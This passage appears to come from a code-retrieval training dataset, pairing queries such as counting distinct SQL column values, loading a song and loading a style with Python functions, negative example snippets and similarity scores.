f02_03_countElemBetween(l, a, b):\n return sum([a < x < b for x in l])", "def count_equal_and_count_less(self, value):\n n_less = 0\n cursor = self.root\n while cursor is not self._NIL_NODE:\n if cursor.value == value:\n n_less += cursor.left_subtree_size\n return cursor.count, n_less\n elif cursor.value < value:\n n_less += cursor.left_subtree_size + cursor.count\n cursor = cursor.right\n else:\n cursor = cursor.left\n\n return 0, n_less", "def gt(self, x, y):\n return self.lt(y,x)", "def count(self, table, q_filter=None):\n try:\n with self.lock:\n return sum(1 for x in self._find(table, self._format_filter(q_filter)))\n except DbException:\n raise\n except Exception as e: # TODO refine\n raise DbException(str(e))", "def compute_outliers(data: np.ndarray, data_range: typing.Tuple[float, float]) -> int:\n return np.count_nonzero((data >= data_range[0]) & (data < data_range[1]))", "def checkRowInTable(table, conditions):\n select = \"SELECT COUNT(*) FROM {0}\".format(table)\n if conditions is None:\n return select\n else:\n select += \" WHERE \"\n for c in conditions:\n select += \"{0}=\\'{1}\\' AND \".format(c[0], c[1])\n return select[:-5] + \" ALLOW FILTERING\"", "def count(self, qid):\n\n bbox = (\n self.to_frame()\n .query(f\"id == '{qid}'\")\n .geometry.bounds.values.flatten()\n .tolist()\n )\n\n # Get points that intersect the quadrant\n point_int = list(self.sindex.intersection(bbox))\n\n return len(point_int) if point_int else 0" ]
[ "0.56505555", "0.55544376", "0.5534052", "0.54158044", "0.53334355", "0.5333287", "0.52193576", "0.5107352", "0.5105168", "0.5078217", "0.5057607", "0.5046411", "0.5044533", "0.5042941", "0.503666", "0.50231636", "0.50128746", "0.4965802", "0.4953175", "0.4945569", "0.49108866", "0.48914155", "0.48866516", "0.48823622", "0.48821336", "0.48602012", "0.4848346", "0.48473504", "0.48434496", "0.484191" ]
0.8394844
0
Queries to find number of distinct values of col column in table in database.
def count_distinct_col(curs, table_name, col='y'): return curs.execute("""SELECT COUNT(DISTINCT {}) FROM {};""".format(col, table_name)).fetchone()[0]
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_unique_counts(df, colname):\n\treturn list(dict(df[colname].value_counts(ascending=False, dropna=False)).values())", "def get_counts(df,col_name):\n return df.groupBy(col_name).count().show()", "def get_unique(self):\n unique_values = len(self.df[self.col_name].unique())\n return unique_values", "def unique_count(df):\r\n\r\n data = []\r\n\r\n for column in df.columns:\r\n data.append((column, df.select(column).distinct().count()))\r\n\r\n return spark.createDataFrame(data, ['column', 'count'])", "def check_unique(df):\n\n print(\"Number of unique values for each column\")\n print(\"=======================================\")\n # print number of unique values of each column\n for col in df.columns:\n print(f\"{col}: {df[col].nunique()}\")", "def __uniqueCountsPandas(df, resCol):\n return df.groupby(resCol).size().to_dict()", "def count_entries(df, col_name='lang'):\n\n # Initialize an empty dictionary: cols_count\n cols_count = {}\n \n # Extract column from DataFrame: col\n col = df[col_name]\n\n # Iterate over the column in DataFrame\n for entry in col:\n\n # If entry is in cols_count, add 1\n if entry in cols_count.keys():\n cols_count[entry] += 1\n\n # Else add the entry to cols_count, set the value to 1\n else:\n cols_count[entry] = 1\n\n # Return the cols_count dictionary\n return cols_count", "def return_uniques_and_counts(df):\n keys, count = dict(), dict()\n keys = (\n df.iloc[:, :].sum(axis=1).apply(set).apply(sorted).to_dict()\n ) # adding all columns\n count = {k: len(v) for k, v in keys.items()}\n\n return keys, count", "def count_entries(df, col_name='lang'):\n \n # Raise a ValueError if col_name is NOT in DataFrame\n if col_name not in df.columns:\n raise ValueError('The DataFrame does not have a ' + col_name + ' column.')\n\n # Initialize an empty dictionary: cols_count\n cols_count = {}\n \n # Extract column from DataFrame: col\n col = df[col_name]\n \n # Iterate over the column in DataFrame\n for entry in col:\n\n # If entry is in cols_count, add 1\n if entry in cols_count.keys():\n cols_count[entry] += 1\n # Else add the entry to cols_count, set the value to 1\n else:\n cols_count[entry] = 1\n \n # Return the cols_count dictionary\n return cols_count", "def get_unique_values(df, colname):\n\treturn list(dict(df[colname].value_counts(ascending=False, dropna=False)).keys())", "def count_entries(self, tablename):\n query = \"Select count(*) from \" + tablename\n try:\n self.__cur.execute(query)\n except Exception as e:\n self.__conn.rollback()\n raise e\n fetcheddata = self.__cur.fetchone()\n return fetcheddata[0]", "def count(column, value, glob=False):\r\n query = db.session.query(func.count('*'))\r\n if glob:\r\n query = query.filter(column.ilike(value))\r\n else:\r\n query = query.filter(func.lower(column) == value.lower())\r\n return query.one()[0]", "def count(self, *columns):\n if not columns:\n columns = ['*']\n\n return int(self.aggregate('count', *columns))", "def count(query):\n cursor = db.execute_sql(query)\n result = cursor.fetchone()[0]\n return result", "def same_num_of_unique_val(df):\n value_count =dict()\n for col in df.columns:\n value_count[col] = list(df[col].value_counts())\n similar_columns = [i for i in combinations(df.columns,2) if (value_count[i[0]]==value_count[i[1]] and i[0] != i[1])]\n if similar_columns != []:\n for (col1, col2) in similar_columns :\n printmd(str(\"* *\" + str(col1) +\"* and *\"+ str(col2)+ \"* have same number of values \"))\n a = pd.DataFrame(df[col1].value_counts()).reset_index()\n a.columns = [str('values_'+col1), 'count']\n b = pd.DataFrame(df[col2].value_counts()).reset_index()\n b.columns = [str('values_'+col2), 'count']\n to_display = a.merge(b, on = 'count')\n display(to_display[['count', str('values_'+col1), str('values_'+col2)]])\n\n else :\n printmd(\"* No columns have same number of unique values\")", "def unique_values(df):\n cols = list(df.columns)\n\n for col in cols:\n uniques = (df[col]).unique()\n print(f\"{len(uniques)} unique items in {col}: {df[col].loc[0]},{df[col].loc[1]}, {df[col].loc[2]}...\")", "def size_sqlite_table(cursor,table_name):\n #Inspired by code of Pieter Muller\n columnsQuery = \"PRAGMA table_info({0})\".format(table_name)\n cursor.execute(columnsQuery)\n numberOfColumns = len(cursor.fetchall())\n \n rowsQuery = \"SELECT Count() FROM ({0})\".format(table_name)\n cursor.execute(rowsQuery)\n numberOfRows = cursor.fetchone()[0]\n return({'nrow':numberOfRows,'ncol':numberOfColumns})", "def fast_count(db, Model): # noqa\n return db.session.execute(\n 'SELECT n_live_tup FROM pg_stat_all_tables WHERE relname = :tablename',\n {'tablename': Model.__tablename__}\n ).scalar()", "def get_number_of_unique_values(X, columns=\"all\", rows_to_scan=10000,\n objects_only=False, return_series=False,\n skip_nans=True):\n if skip_nans:\n print(\"skip_nans not implemented yet\")\n \n if rows_to_scan > X.shape[0] or rows_to_scan == \"all\":\n rows_to_scan = X.shape[0]\n unique_counts = pd.Series()\n \n if columns == \"all\":\n columns = X.columns\n elif type(columns) == str:\n columns = [columns]\n \n for variables in columns:\n if not objects_only or X.dtypes[variables]==\"object\":\n list_of_unique_values = X[variables][:rows_to_scan].unique()\n number_of_unique_values = len(list_of_unique_values)\n# if skip_nans and np.isnan(list_of_unique_values).any():\n# number_of_unique_values -= 1\n unique_counts[variables] = number_of_unique_values\n \n unique_counts.sort()\n pd.set_option('display.max_rows', len(X))\n print(unique_counts)\n pd.set_option('display.max_rows', 0)\n \n if return_series:\n return unique_counts", "def get_record_counts(schema_name, table_name, column_name=''):\n if column_name == '':\n sql = \"\"\"\n SELECT\n count(*) AS 'COUNT',\n null AS 'MIN_VALUE',\n null AS 'MAX_VALUE',\n null AS 'MONTH_CNT'\n FROM\n {0}.{1} with(nolock);\n \"\"\"\n else:\n sql = \"\"\"\n SELECT\n count(*) AS 'COUNT',\n min({2}) AS 'MIN_VALUE',\n max({2}) AS 'MAX_VALUE',\n datediff(MONTH, MIN({2}), MAX({2})) AS 'MONTH_CNT'\n FROM\n {0}.{1} WITH(nolock);\n \"\"\"\n\n return fetch_row(sql.format(schema_name, table_name, column_name))", "def count_entries(df, *args):\n \n #Initialize an empty dictionary: cols_count\n cols_count = {}\n \n # Iterate over column names in args\n for col_name in args:\n \n # Extract column from DataFrame: col\n col = df[col_name]\n \n # Iterate over the column in DataFrame\n for entry in col:\n \n # If entry is in cols_count, add 1\n if entry in cols_count.keys():\n cols_count[entry] += 1\n \n # Else add the entry to cols_count, set the value to 1\n else:\n cols_count[entry] = 1\n\n # Return the cols_count dictionary\n return cols_count", "def n_count(category):\r\n sql = text('''\r\n WITH uniq AS (\r\n SELECT COUNT(app.id) FROM task, app\r\n LEFT OUTER JOIN category ON app.category_id=category.id\r\n WHERE\r\n category.short_name=:category\r\n AND app.hidden=0\r\n AND app.info LIKE('%task_presenter%')\r\n AND task.app_id=app.id\r\n GROUP BY app.id)\r\n SELECT COUNT(*) FROM uniq\r\n ''')\r\n\r\n results = db.engine.execute(sql, category=category)\r\n count = 0\r\n for row in results:\r\n count = row[0]\r\n return count", "def countPlayers():\n #gets the player column from the players table\n conn = DB().execute(\"SELECT COUNT(player) FROM players;\")\n #gets the result of the select statement\n count = conn[\"cursor\"].fetchone()[0]\n conn[\"cursor\"].close()\n return count", "def count_instances(tbl, col2count, colcounted):\n counted_ser = tbl[col2count].value_counts()\n counted_df = pd.DataFrame(counted_ser, columns=[colcounted]).reset_index()\n counted_df.rename(columns={'index':col2count},inplace=True)\n tbl = tbl.merge(counted_df,on=col2count)\n return tbl", "def specht(mu):\n return StandardTableaux(mu).cardinality().n()", "def values_in_col(cursor, table_name, print_out=True):\n c.execute('PRAGMA TABLE_INFO({})'.format(table_name))\n info = c.fetchall()\n col_dict = dict()\n for col in info:\n col_dict[col[1]] = 0\n for col in col_dict:\n c.execute('SELECT ({0}) FROM {1} WHERE {0} IS NOT NULL'.format(col, table_name))\n # In my case this approach resulted in a better performance than using COUNT\n number_rows = len(c.fetchall())\n col_dict[col] = number_rows\n if print_out:\n print(\"\\nNumber of entries per column:\")\n for i in col_dict.items():\n print('{}: {}'.format(i[0], i[1]))\n return col_dict", "def fast_count(query):\n count_query = (query\n .statement.with_only_columns([func.count()]).order_by(None))\n count = query.session.execute(count_query).scalar()\n return count", "def func_Q1(db):\n grades_collection = db.grades\n student_list = list(grades_collection.distinct(\"student_id\", {}))\n\n return len(student_list)", "def query_count(query, params=None):\n count_query = 'SELECT COUNT(*) FROM (' + query + ') AS a;'\n response = database.get_engine().execute(count_query, params)\n count = response.fetchone()\n response.close()\n return count[0]", "def sql(query):\n cursor = db.execute_sql(query)\n list_of_tuples = cursor.fetchall()\n lis = [i[0] for i in list_of_tuples]\n dictionary = {element: lis.count(element) for element in lis}\n return dictionary" ]
[ "0.6991576", "0.69485164", "0.6879922", "0.6863142", "0.67103183", "0.6590594", "0.6463755", "0.63715804", "0.63554555", "0.6342957", "0.6308717", "0.6272405", "0.626818", "0.62482023", "0.62392485", "0.61953485", "0.61704886", "0.61700535", "0.61607206", "0.61574954", "0.61498404", "0.61441994", "0.61106503", "0.6097328", "0.6090846", "0.6073708", "0.6055891", "0.60344297", "0.60020596", "0.5995294" ]
0.8021922
0
Load a song from the given file.
def load_song(self, path): self._menu_select('File->Open') self._open_file(path) try: # Get the annoying Comments window out of the way self._app.Comments.minimize() except MatchError: pass
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def loadSong(fileName):\n with open (fileName, 'r') as f:\n testSong = ast.literal_eval(f.read())\n\n return testSong", "def load(self, song):\n self.currentSongName = song\n self.currentSong = pygame.mixer.music.load(song)", "def _load_sound(file: str) -> pyglet.media.Source:\n\n return pyglet.media.load(Config.RES_DIR + \"sound\" + Config.FILE_SEPARATOR + file)", "def load_music(self, filename):\n self.music = filename\n self.music_playing = False\n if self.is_running:\n if filename is not None:\n cocos.audio.music.control.load(filename)\n else:\n cocos.audio.music.control.stop()", "def play_music(music_file):\n music_file = stim(music_file)\n clock = pygame.time.Clock()\n try:\n pygame.mixer.music.load(music_file)\n print \"Music file %s loaded!\" % music_file\n except pygame.error:\n print \"File %s not found! (%s)\" % (music_file, pygame.get_error())\n return\n pygame.mixer.music.play()\n while pygame.mixer.music.get_busy():\n # check if playback has finished\n clock.tick(30)", "def play_audio(file: str) -> None:\n pygame.mixer.init()\n pygame.mixer.music.load(file)\n pygame.mixer.music.play()\n\n while pygame.mixer.music.get_busy():\n continue", "def load_sound(self, filename):\n return mixer.Sound(os.path.join(\"sounds\", filename))", "def play_music(music_file):\n clock = pygame.time.Clock()\n #try-catch for playing audio from MIDI file\n try:\n pygame.mixer.music.load(music_file)\n print \"Music file %s loaded!\" % music_file\n self.update()\n except pygame.error:\n print \"File %s not found! (%s)\" % (music_file, pygame.get_error())\n return\n pygame.mixer.music.play() #plays MIDI file\n self.update() #updates frame", "def load(self, path):\n (folder, filename) = os.path.split(path)\n (name, extension) = os.path.splitext(filename)\n return Sound(name, Waveform.load(path))", "def play(path):\n sound = AudioSegment.from_mp3(path)\n playback.play(sound)", "def loadTestSong (filename):\n testSong = {}\n #information of analysed song stored in dictionary testSong\n testSong[\"spectrogram\"] = STFTsignal.getSTFTofFile(filename)\n testSong[\"name\"] = filename\n return testSong", "def read(self, filename: Union[str, Path]) -> Music:\n return read_musicxml(filename)", "def playmusic(self, soundfile):\n clock = pygame.time.Clock()\n pygame.mixer.music.load(soundfile)\n pygame.mixer.music.play()\n while pygame.mixer.music.get_busy():\n clock.tick(FRAMERATE)", "def load(self, file):\n self._load(file.encode())", "def from_file(cls, path):\n mp3 = eyed3.load(path)\n\n if mp3 is None:\n raise ValueError(\"File {} does not seem to be a valid MP3\")\n\n self = cls(path)\n self.current_position = None\n self.mtime = os.path.getmtime(path)\n\n if mp3.tag is None:\n # Fallback if no ID3 available\n (dirname, self.title) = os.path.split(path)\n (dirname, self.album) = os.path.split(dirname)\n self.artist = \"\"\n self.track_num = None\n else:\n self.title = mp3.tag.title\n self.artist = mp3.tag.artist\n self.album = mp3.tag.album\n self.track_num = mp3.tag.track_num[0]\n\n return self", "def play_music1(music_file):\n clock = pygame.time.Clock()\n try:\n pygame.mixer.music.load(music_file)\n print (\"Music file %s loaded!\" % music_file)\n except pygame.error:\n print (\"File %s not found! (%s)\" % (music_file, pygame.get_error()))\n return\n pygame.mixer.music.play()\n while pygame.mixer.music.get_busy():\n # check if playback has finished\n clock.tick(30)", "def test_load_mp3_file(self):\n track = Track.from_filename(self.track_path('silence.mp3'))\n self.assertEqual(track.artist, 'Artist')\n self.assertEqual(track.album, 'Album')\n self.assertEqual(track.title, 'Track')\n self.assertEqual(track.ensemble, 'Group')\n self.assertEqual(track.composer, 'Composer')\n self.assertEqual(track.conductor, 'Conductor')\n self.assertEqual(track.tracknum, 1)\n self.assertEqual(track.seconds, 2.0)", "def loadPlayerFile (self):\n #print self.__filename\n if self.__filename == \"\":\n self.__setPlayerFilename()\n #print \"filename= \" + self.__filename \n try:\n #filename handled internally -- derive it from playerName\n# print self.__filename\n f = open(self.__filename, \"r\")\n tempIn = pickle.load(f)\n self.__playerName = tempIn.getPlayerName()\n self.setBestStepRun(tempIn.getBestStepRun())\n self.__songDictionary = tempIn.getAllSongs()\n self.setDifficulty(tempIn.getDifficulty())\n self.setHighScore(tempIn.getHighScore())\n self.setLevelReached(tempIn.getLevelReached())\n f.close() \n except IOError:\n raise PlayerIOError(\"Unable to read player info from file.\")", "def load(self, filename):\n raise NotImplementedError", "def load(cls, filename):\n \n raise NotImplementedError(\"not implemented!\")", "def test_load_opus_file(self):\n track = Track.from_filename(self.track_path('silence.opus'))\n self.assertEqual(track.artist, 'Artist')\n self.assertEqual(track.album, 'Album')\n self.assertEqual(track.title, 'Track')\n self.assertEqual(track.ensemble, 'Group')\n self.assertEqual(track.composer, 'Composer')\n self.assertEqual(track.conductor, 'Conductor')\n self.assertEqual(track.tracknum, 1)\n self.assertEqual(track.seconds, 2.0)", "def create_from_eyed3_file(cls, audio_file):\n #We are doing this here so we throw a very clear import error\n #if eyed3 is unavailable, but only if someone is trying\n #to use functionality that depends on it\n #eyed3 is used to inspect MP3 files\n import eyed3\n\n if not isinstance(audio_file, eyed3.core.AudioFile):\n raise TypeError(\"You broke promises :(\")\n\n return Song(\n audio_file.tag.title, audio_file.tag.artist, audio_file.tag.album,\n audio_file.info.time_secs, audio_file.path)", "def importsong(fpath):\n result = \"\"\n\n tags = checkid3(fpath)\n if tags is not None:\n sig = sigfile(fpath)\n exsong = Song.objects.filter(uniq=sig)\n\n if len(exsong) > 0:\n if exsong[0].filename != fpath:\n result = updatesong(exsong[0], fpath)\n else:\n result = \"[X] %s\" % exsong[0].title\n else:\n result = createsong(tags, sig, fpath, songminplay())\n else:\n logger.error('No tags found in [%s]' % fpath)\n\n return result", "def play_song(self):\r\n path = input('Give path to wanted song: ') # Request path to song\r\n path = path.replace('\\\\', '/')\r\n if not self.path_storage_re.match(path): # Check if the wanted song is from the storage directory\r\n print(\"Give a valid path\")\r\n else:\r\n p = vlc.MediaPlayer(path) # Create VLC instance and play the song\r\n p.play()\r\n self.playSong.append(p)\r\n self.isPlaying = True", "def test_load_ogg_file(self):\n track = Track.from_filename(self.track_path('silence.ogg'))\n self.assertEqual(track.artist, 'Artist')\n self.assertEqual(track.album, 'Album')\n self.assertEqual(track.title, 'Track')\n self.assertEqual(track.ensemble, 'Group')\n self.assertEqual(track.composer, 'Composer')\n self.assertEqual(track.conductor, 'Conductor')\n self.assertEqual(track.tracknum, 1)\n self.assertEqual(track.seconds, 2.0)", "def play(song):\n # Show the metadata\n if (verbose==True):\n for s in song.keys():\n print s, \":\", \n print song[s]\n else:\n print \"Title:\", song[\"title\"]\n print \"Artisit:\", song[\"artist\"]\n print \"Album:\", song[\"albumtitle\"]\n print \"Year\", song[\"public_time\"]\n print \"Company:\", song[\"company\"]\n print \"Length\", song[\"length\"]\n print \"Playing...\"\n mp3_url = song[\"url\"]\n song_length = song[\"length\"]\n p = subprocess.Popen([\"mplayer\", \"-msglevel\", \"all=0\", mp3_url])\n\n # At the same time, download the song:\n u = urllib2.urlopen(mp3_url)\n local_mp3 = open(song[\"title\"] + \"-\" + song[\"artist\"] + \".mp3\", \"w\")\n local_mp3.write(u.read())\n local_mp3.close()\n # time.sleep(song_length)\n i = 0\n while(True):\n time.sleep(1)\n i += 1\n if i == song_length:\n # Kill the process when the song is finished.\n p.terminate()\n print \"#\" * 80\n break", "async def play(self, ctx, *, filename: str):\r\n if not ctx.voice_client:\r\n await self.connect(ctx)\r\n if filename not in self.audio_files:\r\n await ctx.send(\"File {0} not found\".format(filename))\r\n await self.audiofiles(ctx)\r\n else:\r\n ctx.voice_client.play(discord.FFmpegPCMAudio(source=\"{0}{1}.mp3\".format(self.audio_base_dir, filename)))\r\n await ctx.message.delete()", "def load_file(fname):\n ext = os.path.splitext(fname)[1].lower()\n funcptr = _FILEEXTENSIONS.get(ext, None)\n if not funcptr:\n raise ValueError(\"unsupported audio file type\")\n return funcptr(fname)", "def play(filename):\n SoundClient(blocking=True).playWave(filename)", "def load_wav_file(fname):\n fp = wave.open(fname, \"rb\")\n channels = fp.getnchannels()\n bitrate = fp.getsampwidth() * 8\n samplerate = fp.getframerate()\n buf = fp.readframes(fp.getnframes())\n return SoundData(buf, channels, bitrate, len(buf), samplerate)" ]
[ "0.7358361", "0.72585785", "0.6847177", "0.68328434", "0.6698162", "0.66567945", "0.65592307", "0.65188473", "0.6471673", "0.64638644", "0.6448192", "0.6430223", "0.64215535", "0.63958055", "0.63943523", "0.63796645", "0.6167352", "0.61342967", "0.61297315", "0.6129407", "0.61065775", "0.6095958", "0.60752887", "0.60028", "0.6002665", "0.5918124", "0.59161365", "0.5864952", "0.58593047", "0.58585197" ]
0.7262814
1
Load a style from the given file.
def load_style(self, path): self.wait_ready() def open_dialog(): # Bring up the style popup menu and choose to open a style file self._song_pane.click_input(coords=(44, 73), absolute=False) menu = self._app.window(class_name='#32768') menu.menu_item('File Open Style').click_input() wait_until_passes(func=open_dialog, exceptions=ElementNotFoundError, timeout=120, retry_interval=0.4) self._open_file(path)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def loadStyleSheet(self, filename):\n try:\n self.cssfile = \"gui/\" + filename\n with open(self.cssfile, \"r\") as f:\n self.setStyleSheet(f.read())\n except IOError:\n logger.error('No style sheet found!')", "def loadStyleSheet(self, styleFile=None):\n #Read the default file\n file = QtCore.QFile(\"resources/styles/default.css\")\n if not file.open(QtCore.QIODevice.ReadOnly | QtCore.QIODevice.Text) is True :\n raise IOError(\"Can't load the style file.\")\n stylesheet = file.readAll()\n\n #Conversion from QByteArray to Unicode String\n codec = QtCore.QTextCodec.codecForName(\"KOI8-R\")\n string = codec.toUnicode(stylesheet)\n\n #Apply the style to the whole application\n self.setStyleSheet(string)", "def load(self, styleFile):\n\t\tsfile = {}\n\t\twith open(styleFile) as fp:\n\t\t\tsfile = json.load(fp)\n\t\t\n\t\tif \"font\" in sfile:\n\t\t\tself.font = Font(logic.expandPath(sfile[\"font\"]))\n\t\telse:\n\t\t\tself.font = Font()\n\n\t\tif \"text_color\" in sfile:\n\t\t\tself.text_color = sfile[\"text_color\"]\n\t\t\n\t\tif \"disabled_text_color\" in sfile:\n\t\t\tself.disabled_text_color = sfile[\"disabled_text_color\"]\n\t\t\n\t\tif \"regions\" not in sfile or \"image\" not in sfile:\n\t\t\traise Exception(\"Invalid Style file.\")\n\t\t\n\t\timg = ImageTexture(logic.expandPath(sfile[\"image\"]))\n\n\t\tfor name, np in sfile[\"regions\"].items():\n\t\t\tif name in self.textures:\n\t\t\t\tcontinue\n\t\t\tregion = np[0]\n\t\t\tlp, rp, bp, tp = np[1]\n\t\t\tself.textures[name] = NinePatch(img, lp, rp, bp, tp, region)", "def load_style():\n display(HTML(Path('bhsa.css').read_text()))", "def load_style_sheet() -> str:\n return _preprocess_style(_read_text('style.css.template'))", "def load_style_sheet(self, sheetName):\n try:\n file = QFile('%s.qss' % sheetName.lower())\n file.open(QFile.ReadOnly)\n\n styleSheet = file.readAll()\n styleSheet = str(styleSheet, encoding='utf8')\n\n self.setStyleSheet(styleSheet)\n finally:\n file.close()", "def loadstyle(style_name):\n\n style = {}\n nwc_styles = {} # for backwards compatibility\n style_file = os.path.join(HERE, '..', 'rc', style_name)\n try:\n # Check rc directory for built in styles first\n rc_file(style_file)\n except FileNotFoundError:\n # Check current working dir or path\n style_file = style_name\n try:\n rc_file(style_file)\n except FileNotFoundError as err:\n raise StyleNotFoundError(f\"No such style file found: {err}\")\n style = rcParams.copy()\n\n # The style files may also contain an extra section with typography\n # for titles and captions (these can only be separately styled in code,\n # as of Matplotlib 2.2)\n # This is a hack, but it's nice to have all styling in one file\n # The extra styling is prefixed with `#!`\n with open(style_file, 'r') as file_:\n doc = file_.readlines()\n rc_params_newsworthy = \"\\n\".join([d[2:]\n for d in doc if d.startswith(\"#!\")])\n rc_params_newsworthy = yaml.safe_load(rc_params_newsworthy)\n ###\n # Typography\n ###\n if \"title_font\" in rc_params_newsworthy:\n nwc_styles[\"title_font\"] = [\n x.strip() for x in rc_params_newsworthy[\"title_font\"].split(\",\")\n ]\n else:\n nwc_styles[\"title_font\"] = style[\"font.family\"]\n\n # define as pt or reltive (\"smaller\")\n nwc_styles[\"subtitle.fontsize\"] = rc_params_newsworthy.get(\n \"subtitle.fontsize\",\n None,\n )\n\n # make annotation same font size as ticks by default\n tick_font_size = style.get('xtick.labelsize', \"smaller\")\n nwc_styles[\"annotation.fontsize\"] = rc_params_newsworthy.get(\n \"annotation.fontsize\",\n tick_font_size,\n )\n nwc_styles[\"note.fontsize\"] = rc_params_newsworthy.get(\n \"note.fontsize\",\n \"smaller\",\n )\n nwc_styles[\"caption.fontsize\"] = rc_params_newsworthy.get(\n \"caption.fontsize\",\n \"smaller\",\n )\n\n color = rc_params_newsworthy.get(\"neutral_color\",\n rcParams[\"figure.edgecolor\"])\n black_color = rc_params_newsworthy.get(\"black_color\", BLACK)\n dark_gray_color = rc_params_newsworthy.get(\"dark_gray_color\", DARK_GRAY)\n light_gray_color = rc_params_newsworthy.get(\"light_gray_color\", LIGHT_GRAY)\n strong_color = rc_params_newsworthy.get(\"strong_color\", color)\n positive_color = rc_params_newsworthy.get(\"positive_color\", POSITIVE)\n negative_color = rc_params_newsworthy.get(\"negative_color\", NEGATIVE)\n warm_color = rc_params_newsworthy.get(\"warm_color\", WARM)\n cold_color = rc_params_newsworthy.get(\"cold_color\", COLD)\n fill_between_color = rc_params_newsworthy.get(\"fill_between_color\", FILL_BETWEEN)\n fill_between_alpha = rc_params_newsworthy.get(\"fill_between_alpha\", 0.5)\n nwc_styles[\"black_color\"] = to_rgba(\"#\" + str(black_color), 1)\n nwc_styles[\"dark_gray_color\"] = to_rgba(\"#\" + str(dark_gray_color), 1)\n nwc_styles[\"light_gray_color\"] = to_rgba(\"#\" + str(light_gray_color), 1)\n nwc_styles[\"neutral_color\"] = to_rgba(\"#\" + str(color), 1)\n nwc_styles[\"strong_color\"] = to_rgba(\"#\" + str(strong_color), 1)\n nwc_styles[\"positive_color\"] = to_rgba(\"#\" + positive_color, 1)\n nwc_styles[\"negative_color\"] = to_rgba(\"#\" + negative_color, 1)\n nwc_styles[\"warm_color\"] = to_rgba(\"#\" + warm_color, 1)\n nwc_styles[\"cold_color\"] = to_rgba(\"#\" + cold_color, 1)\n nwc_styles[\"fill_between_color\"] = to_rgba(\"#\" + str(fill_between_color), 1)\n nwc_styles[\"fill_between_alpha\"] = float(fill_between_alpha)\n\n if \"qualitative_colors\" in rc_params_newsworthy:\n nwc_styles[\"qualitative_colors\"] = [\n to_rgba(\"#\" + c.strip(), 1)\n for c in rc_params_newsworthy[\"qualitative_colors\"].split(\",\")\n ]\n\n else:\n nwc_styles[\"qualitative_colors\"] = [to_rgba(\"#\" + c, 1) for c in QUALITATIVE]\n if \"logo\" in rc_params_newsworthy:\n nwc_styles[\"logo\"] = rc_params_newsworthy[\"logo\"]\n\n return style, nwc_styles", "def load_style() -> str:\n return '<style id=\"scipp-style-sheet\">' + load_style_sheet() + '</style>'", "def load_stylesheet(name):\n with suppress(FileNotFoundError):\n with open(STATIC_PATH / name, 'rt') as stylesheet:\n style = stylesheet.read().replace('@Path', (IMAGES_PATH / settings.value(Key.Theme)).as_posix())\n return style\n return ''", "def load_string(f):\n\n with open(\"css/{filename}.seas\".format(filename=f), \"r\") as design:\n Builder.load_string(design.read())", "def load_font(self, file):\n self.font = []\n with open(file, 'rb') as f:\n while True:\n buf = f.read(FONT_HEIGHT)\n if not buf:\n break\n self.font.append(buf)", "def load_QtCSS_StyleSheet(path):\n with open(path, \"rt\") as f:\n lines = f.read()\n return lines", "def load_file(file_name):\n file = open(file_name, 'r')#open the file\n colors = file.read() #reads entire contents of the file and assigns it to names. This is the processing of the file\n file.close() #always close the file\n\n return colors", "def apply_css(self, path):\n\n provider = Gtk.CssProvider()\n provider.load_from_path(path)\n Gtk.StyleContext.add_provider_for_screen(\n Gdk.Screen.get_default(), provider, Gtk.STYLE_PROVIDER_PRIORITY_APPLICATION)", "def _load_font(file: str) -> None:\n\n pyglet.font.add_file(Config.RES_DIR + \"font\" + Config.FILE_SEPARATOR + file)\n pyglet.font.load(\"Munro\")", "def load(self, file):\n self.namespace['workflow'].configfile(file)\n self.updateNamespace()", "def load_from_file(cls, filename):\n with open(filename, \"r\") as fd:\n return cls.load(fd)", "def load_from(filename):\n from .io import load\n return load(filename)", "def load(self, file):\n self._load(file.encode())", "def _load_external(self, url):\n if url.startswith('//'):\n # then we have to rely on the base_url\n if self.base_url and 'https://' in self.base_url:\n url = 'https:' + url\n else:\n url = 'http:' + url\n\n if url.startswith('http://') or url.startswith('https://'):\n css_body = self._load_external_url(url)\n else:\n stylefile = url\n if not os.path.isabs(stylefile):\n stylefile = os.path.abspath(\n os.path.join(self.base_path or '', stylefile)\n )\n if os.path.exists(stylefile):\n with codecs.open(stylefile, encoding='utf-8') as f:\n css_body = f.read()\n elif self.base_url:\n url = urllib.parse.urljoin(self.base_url, url)\n return self._load_external(url)\n else:\n raise ValueError(\"Could not find external style: %s\" %\n stylefile)\n return css_body", "def load(self, file_path):\n get_base().scene_parser.load(file_path)", "def load(self, file):\n\n with open(file, 'r') as f:\n self._lines = Lines(f.read().splitlines())\n\n self._parse()", "def load(self, file):\n\n with open(file, 'r') as f:\n self._lines = Lines(f.read().splitlines())\n\n self._parse()", "def load(file):\n _config.load(file)", "def load_from_file(cls, file=None, file_path=None):\n if not file:\n file = open(file_path, 'r') \n if not file_path:\n file_path = file.name\n with file:\n file_meta = cls._get_file_meta(file, file_path=file_path)\n cls_properties = dict([[p, file_meta.get(p, None)] for p in cls.properties()])\n cls(key_name=file_path, **cls_properties).put()", "def load(filename):\n path = Path(__file__).parent / \"resources\" / filename\n with path.open() as file:\n return lkml.load(file)", "def load(cls, filename):\n \n raise NotImplementedError(\"not implemented!\")", "def from_cheetah_file(cls, filename):\n return translate.load_cheetah(cls, filename)", "def load(path, colorkey):\n tpath = _path(path)\n if tpath in _cache:\n return _cache[tpath].get_sheet(colorkey)\n else:\n sheet = Spritesheet(tpath, colorkey)\n _cache[tpath] = sheet\n return sheet.get_sheet(colorkey)", "def load_default_style(self):\n self._css_shape = {\n \"point\": {\"color\": (255,0,0), \"paint\": fshape.FILL, \"z-index\":0},\n \"line\": {\"color\": (0,255,0), \"paint\": fshape.STROKE, \"z-index\":0},\n \"area\": {\"color\": (0,0,255), \"paint\": fshape.FILL, \"z-index\":0},\n \"text\": {\"color\": (0,0,0), \"angle\":0, \"paint\": fshape.FILL, \"z-index\":0}\n }\n \n # jeigu simbolis yra nurodytas, tai cia jo stiliaus aprasymas\n self._css_symbol = {\n \"graphics\": {\"z-index\":1000, \"color\": (255,0,0), \"line-width\":0.12} # ocad simboliams kurie yra paversti i grafika\n #\"901_1\": {\"name\":\"Road\", \"color\": (204, 204, 204)}\n }" ]
